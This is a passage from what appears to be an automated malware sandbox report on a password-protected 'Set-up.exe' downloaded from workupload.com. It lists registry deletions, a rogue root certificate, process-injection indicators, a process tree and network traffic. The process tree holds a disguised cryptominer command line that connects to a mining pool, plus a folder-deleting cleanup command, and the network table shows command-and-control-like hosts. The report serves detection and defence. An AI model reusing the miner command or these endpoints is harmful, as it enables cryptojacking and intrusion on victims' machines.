| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{32FB36EF-2E57-345C-98BA-051FB07F8F6C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CID\97428b24-83cc-4966-b120-dee4d93b01f5\Description | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AB968F1E-E20B-403A-9EB8-72EB0EB6797E} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0294-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{70446B90-F93B-3578-9B7B-95D05A12DA60}\4.0.0.0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Windows.CompositeFont\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\VLC.mlp\shell\PlayWithVLC\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.sct | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EFA9C1B9-47B0-4BD8-AC63-DDF785C505B4} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6b140a40-d461-555a-b6eb-5dbb8e2101e5} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0002098E-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024495-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{51973C2C-CB0C-11D0-B5C9-00A0244A0E7A} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{C3689F20-C231-11CE-A30C-00AA004A3D3C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\shell\OpenWithSetDefaultOn | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4D170556-98A1-43DD-B2EC-50C90CF248DF} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.svg | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{000209FE-0000-0000-C000-000000000046}\InprocHandler32 | C:\Windows\regedit.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\SETAP_9191__PA$$W0rdS~!^!.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\IObitUnlockerPortable.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Runs regedit.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Set-up.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFIJKFHIJ.exe | N/A |
| N/A | N/A | C:\ProgramData\CAFHIJDHDG.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\help\fxcloud.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ftp.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\SETAP_9191__PA$$W0rdS~!^!.zip
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3792,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PublishSet.mpeg"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.0.306093867\1207828895" -parentBuildID 20230214051806 -prefsHandle 1756 -prefMapHandle 1748 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5cfeff09-00fd-4afd-ab4b-49ddfd7006cf} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 1848 2259b90ef58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.1.149958981\2019989710" -parentBuildID 20230214051806 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c72244b-5c69-4ec6-ad08-369ffaecf285} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 2416 22587589958 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.2.1134724445\1139413036" -childID 1 -isForBrowser -prefsHandle 3012 -prefMapHandle 3008 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b268f74-c367-4eca-b7f1-a9e3eb540b04} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 3024 2259dfeb858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.3.935600193\790870425" -childID 2 -isForBrowser -prefsHandle 4216 -prefMapHandle 4212 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c44e9e7-d2de-4432-8aa3-26e832047fb1} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 4228 225a0bc7b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.4.24902912\2125274360" -childID 3 -isForBrowser -prefsHandle 5048 -prefMapHandle 5012 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d92816c-1d23-44c8-8b18-d71b6499d721} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5056 225a2f9c858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.5.1911889249\1316800176" -childID 4 -isForBrowser -prefsHandle 5188 -prefMapHandle 5044 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efb6b0ad-9901-49c2-943e-9cb64fc7d4ad} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5176 225a2f9cb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.6.772719190\1642011243" -childID 5 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60214734-3ca6-4012-8a5a-f0092fe39891} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5452 225a2fec958 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4228.7.671205793\922696505" -childID 6 -isForBrowser -prefsHandle 1556 -prefMapHandle 2824 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1296 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87c1463d-755f-47c5-a0db-c554a7570834} 4228 "\\.\pipe\gecko-crash-server-pipe.4228" 5204 225a0326158 tab
C:\Users\Admin\Desktop\Set-up.exe
"C:\Users\Admin\Desktop\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\Desktop\Set-up.exe
"C:\Users\Admin\Desktop\Set-up.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3604,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3140 /prefetch:3
C:\ProgramData\CAFIJKFHIJ.exe
"C:\ProgramData\CAFIJKFHIJ.exe"
C:\ProgramData\CAFHIJDHDG.exe
"C:\ProgramData\CAFHIJDHDG.exe"
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Users\Admin\AppData\Local\Temp\dcom.au3
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KECBFBAEBKJJ" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4124,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3112 /prefetch:8
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Users\Admin\AppData\Roaming\help\fxcloud.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\SysWOW64\ftp.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.121.18.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:49848 | | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 52.42.69.239:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 239.69.42.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:49855 | | tcp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:80 | workupload.com | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 176.116.9.5.in-addr.arpa | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 142.250.187.238:443 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| DE | 5.9.116.176:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| DE | 138.201.30.227:443 | f92.workupload.com | tcp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| US | 8.8.8.8:53 | f92.workupload.com | udp |
| US | 8.8.8.8:53 | 227.30.201.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | poocoin.online | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.249.124.192.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | 18.53.55.162.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | businessdownloads.ltd | udp |
| US | 104.21.16.123:443 | businessdownloads.ltd | tcp |
| US | 8.8.8.8:53 | 123.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| US | 8.8.8.8:53 | i.imgur.com | udp |
| US | 199.232.196.193:443 | i.imgur.com | tcp |
| US | 8.8.8.8:53 | 193.196.232.199.in-addr.arpa | udp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| DE | 162.55.53.18:9000 | 162.55.53.18 | tcp |
| FI | 135.181.22.88:80 | 135.181.22.88 | tcp |
| US | 8.8.8.8:53 | 88.22.181.135.in-addr.arpa | udp |
| US | 8.8.8.8:53 | proresupdate.com | udp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | 146.112.152.45.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | workupload.com | udp |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 49.13.126.162:443 | t.workupload.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| US | 8.8.8.8:53 | 162.126.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.176.76.144.in-addr.arpa | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| DE | 176.9.34.148:443 | f84.workupload.com | tcp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| US | 8.8.8.8:53 | f84.workupload.com | udp |
| US | 8.8.8.8:53 | 148.34.9.176.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 45.152.112.146:80 | proresupdate.com | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| NL | 2.18.121.79:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1---sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 79.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 53.121.117.34.in-addr.arpa | udp |
| FI | 65.109.127.181:3333 | | tcp |
| FI | 65.109.127.181:3333 | | tcp |
